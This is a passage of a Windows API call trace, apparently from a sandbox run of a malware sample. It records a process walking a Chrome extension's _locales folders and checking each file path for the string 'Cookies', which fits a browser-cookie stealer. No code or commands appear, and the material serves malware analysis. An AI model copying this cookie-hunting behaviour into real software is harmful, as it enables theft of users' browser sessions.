Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*.*" [0163.222] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*.*", lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9bc0 [0163.223] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.223] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.223] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.223] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.223] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ar", cAlternateFileName="")) returned 1 [0163.223] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0163.223] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0163.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.223] lstrlenW (lpString="\\") returned 1 [0163.223] GetProcessHeap () returned 0x8e0000 [0163.223] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0163.223] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.223] lstrlenW (lpString="ar") returned 2 [0163.223] GetProcessHeap () returned 0x8e0000 [0163.223] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0163.223] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" [0163.223] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.223] GetProcessHeap () returned 0x8e0000 [0163.223] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0163.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned 137 [0163.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned 137 [0163.223] lstrlenW (lpString="\\*.*") returned 4 [0163.224] GetProcessHeap () returned 0x8e0000 [0163.224] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x9173a0 [0163.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" [0163.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*.*" [0163.224] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.224] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.224] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.224] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.224] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.224] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned 137 [0163.224] lstrlenW (lpString="\\") returned 1 [0163.224] GetProcessHeap () returned 0x8e0000 [0163.224] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x9174c8 [0163.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" [0163.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\" [0163.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\") returned 138 [0163.224] lstrlenW (lpString="messages.json") returned 13 [0163.224] GetProcessHeap () returned 0x8e0000 [0163.224] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x9175e8 [0163.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\" [0163.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" [0163.225] VirtualQuery (in: lpAddress=0x9174c8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.225] GetProcessHeap () returned 0x8e0000 [0163.225] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9174c8 | out: hHeap=0x8e0000) returned 1 [0163.225] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", lpSrch="Cookies") returned 0x0 [0163.225] VirtualQuery (in: lpAddress=0x9175e8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.225] GetProcessHeap () returned 0x8e0000 [0163.225] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9175e8 | out: hHeap=0x8e0000) returned 1 [0163.225] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.225] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.225] VirtualQuery (in: lpAddress=0x9173a0, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.225] GetProcessHeap () returned 0x8e0000 [0163.225] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9173a0 | out: hHeap=0x8e0000) returned 1 [0163.225] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.225] GetProcessHeap () returned 0x8e0000 [0163.225] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0163.225] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="bg", cAlternateFileName="")) returned 1 [0163.225] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0163.225] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0163.225] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.225] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.225] lstrlenW (lpString="\\") returned 1 [0163.225] GetProcessHeap () returned 0x8e0000 [0163.225] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0163.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.225] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.225] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.225] lstrlenW (lpString="bg") returned 2 [0163.225] GetProcessHeap () returned 0x8e0000 [0163.225] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0163.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" [0163.226] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.226] GetProcessHeap () returned 0x8e0000 [0163.226] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0163.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned 137 [0163.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned 137 [0163.226] lstrlenW (lpString="\\*.*") returned 4 [0163.226] GetProcessHeap () returned 0x8e0000 [0163.226] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x9173a0 [0163.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" [0163.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*.*" [0163.226] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.226] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.226] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.226] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.226] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.226] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned 137 [0163.226] lstrlenW (lpString="\\") returned 1 [0163.226] GetProcessHeap () returned 0x8e0000 [0163.226] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x9174c8 [0163.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" [0163.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 